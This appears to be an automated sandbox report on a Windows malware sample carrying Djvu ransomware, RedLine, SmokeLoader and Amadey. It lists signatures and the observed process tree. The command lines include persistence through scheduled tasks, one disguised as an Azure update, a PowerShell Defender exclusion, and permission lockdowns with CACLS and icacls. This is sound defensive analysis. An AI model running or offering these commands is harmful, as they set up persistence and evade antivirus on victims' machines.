Malware Analysis Report

2025-04-14 07:03

Sample ID 230723-2q5jxahe5s
Target file.exe
SHA256 e7f7aba3aa560f0e301fb6d8451914efd3c86c88be4cd1f8a8eb994d58ceb3c5
Tags
amadey djvu fabookie redline smokeloader logsdiller cloud (tg: @logsdillabot) backdoor discovery evasion infostealer ransomware spyware stealer trojan pub1
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e7f7aba3aa560f0e301fb6d8451914efd3c86c88be4cd1f8a8eb994d58ceb3c5

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary

amadey djvu fabookie redline smokeloader logsdiller cloud (tg: @logsdillabot) backdoor discovery evasion infostealer ransomware spyware stealer trojan pub1

Detected Djvu ransomware

Djvu Ransomware

Fabookie

Amadey

Detect Fabookie payload

SmokeLoader

RedLine

Downloads MZ/PE file

Stops running service(s)

Deletes itself

Executes dropped EXE

Modifies file permissions

Loads dropped DLL

Looks up external IP address via web service

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-23 22:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-23 22:48

Reported

2023-07-23 22:50

Platform

win7-20230712-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2208 set thread context of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\BB3F.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\EA6E.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\EA6E.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\EA6E.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1300 wrote to memory of 2208 N/A N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 1300 wrote to memory of 2208 N/A N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 1300 wrote to memory of 2208 N/A N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 1300 wrote to memory of 2208 N/A N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 1300 wrote to memory of 2752 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1300 wrote to memory of 2752 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1300 wrote to memory of 2752 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1300 wrote to memory of 2752 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1300 wrote to memory of 2752 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2752 wrote to memory of 2384 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2384 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2384 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2384 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2384 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2384 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2752 wrote to memory of 2384 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1300 wrote to memory of 2992 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1300 wrote to memory of 2992 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1300 wrote to memory of 2992 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1300 wrote to memory of 2992 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1300 wrote to memory of 2992 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2208 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 2208 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 2208 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 2208 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 2208 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 2208 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 2208 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 2208 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 2208 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 2208 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 2992 wrote to memory of 2720 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2992 wrote to memory of 2720 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2992 wrote to memory of 2720 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2992 wrote to memory of 2720 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2992 wrote to memory of 2720 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2992 wrote to memory of 2720 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2992 wrote to memory of 2720 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2208 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\EA6E.exe C:\Users\Admin\AppData\Local\Temp\EA6E.exe
PID 1300 wrote to memory of 1444 N/A N/A C:\Users\Admin\AppData\Local\Temp\35E.exe
PID 1300 wrote to memory of 1444 N/A N/A C:\Users\Admin\AppData\Local\Temp\35E.exe
PID 1300 wrote to memory of 1444 N/A N/A C:\Users\Admin\AppData\Local\Temp\35E.exe
PID 1300 wrote to memory of 1444 N/A N/A C:\Users\Admin\AppData\Local\Temp\35E.exe
PID 1444 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1444 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1444 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1444 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1444 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1444 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1444 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1444 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1444 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1444 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1444 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1444 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\35E.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 2040 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2040 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2040 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2040 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\EA6E.exe

C:\Users\Admin\AppData\Local\Temp\EA6E.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ECEF.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\ECEF.dll

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\EEB4.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\EEB4.dll

C:\Users\Admin\AppData\Local\Temp\EA6E.exe

C:\Users\Admin\AppData\Local\Temp\EA6E.exe

C:\Users\Admin\AppData\Local\Temp\35E.exe

C:\Users\Admin\AppData\Local\Temp\35E.exe

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\c95a2aed-1cdc-4570-a8b8-6020ea1de38d" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\EA6E.exe

"C:\Users\Admin\AppData\Local\Temp\EA6E.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\EA6E.exe

"C:\Users\Admin\AppData\Local\Temp\EA6E.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\233E.exe

C:\Users\Admin\AppData\Local\Temp\233E.exe

C:\Users\Admin\AppData\Local\Temp\233E.exe

C:\Users\Admin\AppData\Local\Temp\233E.exe

C:\Users\Admin\AppData\Local\Temp\2773.exe

C:\Users\Admin\AppData\Local\Temp\2773.exe

C:\Users\Admin\AppData\Local\Temp\2773.exe

C:\Users\Admin\AppData\Local\Temp\2773.exe

C:\Users\Admin\AppData\Local\Temp\2F12.exe

C:\Users\Admin\AppData\Local\Temp\2F12.exe

C:\Users\Admin\AppData\Local\Temp\233E.exe

"C:\Users\Admin\AppData\Local\Temp\233E.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\2F12.exe

C:\Users\Admin\AppData\Local\Temp\2F12.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {CF3E08C9-22F5-4BD3-85F3-B1266DCA8DFF} S-1-5-21-4159544280-4273523227-683900707-1000:UMAXQRGK\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\233E.exe

"C:\Users\Admin\AppData\Local\Temp\233E.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\3653.exe

C:\Users\Admin\AppData\Local\Temp\3653.exe

C:\Users\Admin\AppData\Local\Temp\3653.exe

C:\Users\Admin\AppData\Local\Temp\3653.exe

C:\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build2.exe

"C:\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build2.exe"

C:\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build3.exe

"C:\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\2773.exe

"C:\Users\Admin\AppData\Local\Temp\2773.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\2773.exe

"C:\Users\Admin\AppData\Local\Temp\2773.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\2F12.exe

"C:\Users\Admin\AppData\Local\Temp\2F12.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\2F12.exe

"C:\Users\Admin\AppData\Local\Temp\2F12.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\A9EE.exe

C:\Users\Admin\AppData\Local\Temp\A9EE.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\AD1A.dll

C:\Users\Admin\AppData\Local\Temp\AF9B.exe

C:\Users\Admin\AppData\Local\Temp\AF9B.exe

C:\Users\Admin\AppData\Local\Temp\BB3F.exe

C:\Users\Admin\AppData\Local\Temp\BB3F.exe

C:\Users\Admin\AppData\Local\6b4dbbde-2940-4d38-bda8-4d53563c0346\build2.exe

"C:\Users\Admin\AppData\Local\6b4dbbde-2940-4d38-bda8-4d53563c0346\build2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\AF9B.exe

C:\Users\Admin\AppData\Local\Temp\AF9B.exe

C:\Users\Admin\AppData\Local\daf77b98-1679-4fe9-9ac6-299e82b1fea4\build2.exe

"C:\Users\Admin\AppData\Local\daf77b98-1679-4fe9-9ac6-299e82b1fea4\build2.exe"

C:\Users\Admin\AppData\Local\Temp\D46B.exe

C:\Users\Admin\AppData\Local\Temp\D46B.exe

C:\Users\Admin\AppData\Local\Temp\E953.exe

C:\Users\Admin\AppData\Local\Temp\E953.exe

C:\Users\Admin\AppData\Local\Temp\EAF9.exe

C:\Users\Admin\AppData\Local\Temp\EAF9.exe

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\AD1A.dll

C:\Users\Admin\AppData\Local\Temp\EDA9.exe

C:\Users\Admin\AppData\Local\Temp\EDA9.exe

C:\Users\Admin\AppData\Local\Temp\A9EE.exe

C:\Users\Admin\AppData\Local\Temp\A9EE.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\FA76.dll

C:\Users\Admin\AppData\Local\Temp\FCE7.exe

C:\Users\Admin\AppData\Local\Temp\FCE7.exe

C:\Users\Admin\AppData\Local\Temp\EDA9.exe

C:\Users\Admin\AppData\Local\Temp\EDA9.exe

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\FA76.dll

C:\Users\Admin\AppData\Local\Temp\1FA4.exe

C:\Users\Admin\AppData\Local\Temp\1FA4.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

